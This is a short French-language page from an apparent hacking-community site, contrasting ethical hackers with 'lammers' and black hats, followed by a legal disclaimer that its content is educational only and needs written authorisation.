Un hacker par définition est une personne qui cherche à améliorer les systèmes d'information dans le seul et unique but de contribuer à la stabilité de ces systèmes!
La croyance populaire laisse entendre que les hackers sont des pirates.
C'est vrai. Mais il y a différents types de pirate.
Tout comme il y a différents types de personnes.
Les bavures courantes auxquelles on pense lorsqu'on évoque le terme de pirate informatique
seraient les hacks de compte msn, ordinateurs lâchement trojantés avec des exploits déjà tous faits
et encore peut-on classifier en tant que hack le fait de spammer
alors que depuis plus de 15 ans des scripts tous faits le font extrêmement bien?

Ce ne sont pas des hackers qui font ça!!!
Nous appelons ces gens des lammers! Quand ils sont mauvais,
ou des black hat lorsqu'ils sont doués dans la mise en application de leurs méfaits.
Aucun amour propre - Aucune dignité
Agissent par dégout, vengeance ou simple plaisir.
Les raisons peuvent être nombreuses et je ne prétends pas devoir juger qui que ce soit.
Je pense juste que l'on ne doit pas utiliser l'épée de fly pour commettre des injustices.
Il est 100 fois plus profitable d'améliorer un système que de marcher sur un château de sable... même si marcher sur un château de sable est rigolo :P
A vous de trouver votre amusement. ;)

Tu peux réagir sur la shootbox


Disclaimer Veuillez lire obligatoirement les règles ci-dessous avant de consulter ce site.
Conformément aux dispositions des différentes lois en vigueur, intrusions et maintenances frauduleuses sur un site, vol et / ou falsification de données.
Vous ne devez en aucun cas mettre en application les stratagèmes mis en place par ce site, qui sont présentés uniquement à titre d’éducation et de recherche dans le domaine de la protection de données.
Vous ne devez en aucun cas utiliser ce que vous aurez découvert, sauf si vous avez une autorisation écrite de l’administrateur d’un site ou que celui-ci vous ai ouvert un compte uniquement pour la recherche de failles.
Tout cela est interdit et illégal ne faites pas n'importe quoi.
Vous acceptez donc que l'administrateur de ce site n'est en aucun cas responsable d'aucun de vos actes. Sinon quittez ce site.
Vous êtes soumis à ce disclaimer.
ET À CE TITRE, NI LA COMMUNAUTÉ, NI L'ADMINISTRATEUR, NI L'HÉBERGEUR, NE POURRONT, NI NE SERONT RESPONSABLE DE VOS ACTES.